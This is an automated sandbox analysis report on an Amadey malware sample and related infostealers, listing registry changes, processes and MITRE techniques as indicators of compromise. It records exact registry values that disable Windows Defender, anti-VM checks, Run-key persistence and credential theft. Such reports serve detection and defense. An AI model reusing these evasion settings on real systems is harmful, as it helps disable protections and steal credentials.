amadey | 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE

Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
stealer povertystealer
Povertystealer family
povertystealer
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral1/memory/2896-280-0x0000000000A20000-0x0000000000E98000-memory.dmp	family_sectoprat
behavioral1/memory/2896-281-0x0000000000A20000-0x0000000000E98000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ebp51gY.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1c378480ff.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	bf1e1b38e9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d50bc265d4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempU7JAYGKZQ0XZ9ELIYHE2RYLCMWFSFKUY.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f51a7aa350.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	44720c9602.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ftS1RPn.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ftS1RPn.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	094249b63a.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6f32fb5c60.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	41e4355916.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7c18fb7ceb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a60165c390.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	964beb63e8.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
6	1016	powershell.exe
8	2356	powershell.exe
166	2944	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
896	powershell.exe
788	powershell.exe
1540	powershell.exe
1016	powershell.exe
2356	powershell.exe
2944	powershell.exe

Downloads MZ/PE file 22 IoCs

flow	pid	Process
7	2432	skotes.exe
7	2432	skotes.exe
7	2432	skotes.exe
7	2432	skotes.exe
7	2432	skotes.exe
7	2432	skotes.exe
7	2432	skotes.exe
7	2432	skotes.exe
7	2432	skotes.exe
7	2432	skotes.exe
7	2432	skotes.exe
7	2432	skotes.exe
7	2432	skotes.exe
45	1120	BitLockerToGo.exe
77	2432	skotes.exe
77	2432	skotes.exe
77	2432	skotes.exe
91	2340	BitLockerToGo.exe
6	1016	powershell.exe
8	2356	powershell.exe
166	2944	powershell.exe
5	2432	skotes.exe

Checks BIOS information in registry 2 TTPs 38 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ebp51gY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	44720c9602.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a60165c390.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1c378480ff.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bf1e1b38e9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f51a7aa350.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ftS1RPn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1c378480ff.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	41e4355916.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ftS1RPn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	964beb63e8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f51a7aa350.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a60165c390.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d50bc265d4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ftS1RPn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bf1e1b38e9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d50bc265d4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	094249b63a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6f32fb5c60.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ftS1RPn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ebp51gY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	44720c9602.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	094249b63a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6f32fb5c60.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempU7JAYGKZQ0XZ9ELIYHE2RYLCMWFSFKUY.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	41e4355916.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7c18fb7ceb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7c18fb7ceb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempU7JAYGKZQ0XZ9ELIYHE2RYLCMWFSFKUY.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	964beb63e8.exe

Executes dropped EXE 24 IoCs

pid	Process
2432	skotes.exe
560	075b91d2c5.exe
572	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
588	483d2fa8a0d53818306efeb32d3.exe
828	3c859bf5b2.exe
1716	f25e11565c.exe
2784	41e4355916.exe
1696	f51a7aa350.exe
2896	44720c9602.exe
2968	7c18fb7ceb.exe
2700	a60165c390.exe
1112	d50bc265d4.exe
1900	ftS1RPn.exe
2228	094249b63a.exe
1828	6f32fb5c60.exe
1608	8ee8d5c43d.exe
2784	7584b57e33.exe
3592	TempU7JAYGKZQ0XZ9ELIYHE2RYLCMWFSFKUY.EXE
3816	964beb63e8.exe
4016	ftS1RPn.exe
3216	DTQCxXZ.exe
3564	ebp51gY.exe
3768	1c378480ff.exe
1252	bf1e1b38e9.exe

Identifies Wine through registry keys 2 TTPs 19 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	094249b63a.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	44720c9602.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	ftS1RPn.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	6f32fb5c60.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	TempU7JAYGKZQ0XZ9ELIYHE2RYLCMWFSFKUY.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	a60165c390.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	964beb63e8.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	1c378480ff.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	bf1e1b38e9.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	41e4355916.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	ftS1RPn.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	ebp51gY.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	f51a7aa350.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	7c18fb7ceb.exe
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine	d50bc265d4.exe

Loads dropped DLL 43 IoCs

pid	Process
1972	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe
1972	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe
2432	skotes.exe
1016	powershell.exe
1016	powershell.exe
2356	powershell.exe
2356	powershell.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2436	WerFault.exe
2436	WerFault.exe
2436	WerFault.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
1120	BitLockerToGo.exe
2432	skotes.exe
2944	powershell.exe
2944	powershell.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2340	BitLockerToGo.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe
2432	skotes.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\7584b57e33.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090512001\\7584b57e33.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\075b91d2c5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090449101\\075b91d2c5.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090450021\\am_no.cmd"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\094249b63a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090509001\\094249b63a.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\6f32fb5c60.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090510001\\6f32fb5c60.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\8ee8d5c43d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090511001\\8ee8d5c43d.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0009000000016d3a-32.dat	autoit_exe
behavioral1/files/0x0005000000019d40-784.dat	autoit_exe
behavioral1/files/0x0005000000019fc3-886.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs

pid	Process
1972	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe
2432	skotes.exe
572	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
588	483d2fa8a0d53818306efeb32d3.exe
2784	41e4355916.exe
1696	f51a7aa350.exe
2896	44720c9602.exe
2968	7c18fb7ceb.exe
2700	a60165c390.exe
1112	d50bc265d4.exe
1900	ftS1RPn.exe
2228	094249b63a.exe
1828	6f32fb5c60.exe
3592	TempU7JAYGKZQ0XZ9ELIYHE2RYLCMWFSFKUY.EXE
3816	964beb63e8.exe
4016	ftS1RPn.exe
3564	ebp51gY.exe
3768	1c378480ff.exe
1252	bf1e1b38e9.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1696 set thread context of 1120	1696	f51a7aa350.exe	64
PID 828 set thread context of 2952	828	3c859bf5b2.exe	66
PID 2968 set thread context of 2340	2968	7c18fb7ceb.exe	72

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2436	2700	WerFault.exe	68

System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3c859bf5b2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DTQCxXZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	094249b63a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8ee8d5c43d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	8ee8d5c43d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ftS1RPn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ebp51gY.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1c378480ff.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f25e11565c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	41e4355916.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6f32fb5c60.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7584b57e33.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bf1e1b38e9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d50bc265d4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ftS1RPn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	8ee8d5c43d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a60165c390.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempNMG8QR4OWZYO0ORQ1N60KLFXVE7XNSDD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	44720c9602.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7c18fb7ceb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	964beb63e8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	075b91d2c5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f51a7aa350.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	a60165c390.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	a60165c390.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
2856	timeout.exe

Kills process with taskkill 5 IoCs

pid	Process
1824	taskkill.exe
1344	taskkill.exe
824	taskkill.exe
1520	taskkill.exe
2436	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

defense_evasion spyware trojan

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 9 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030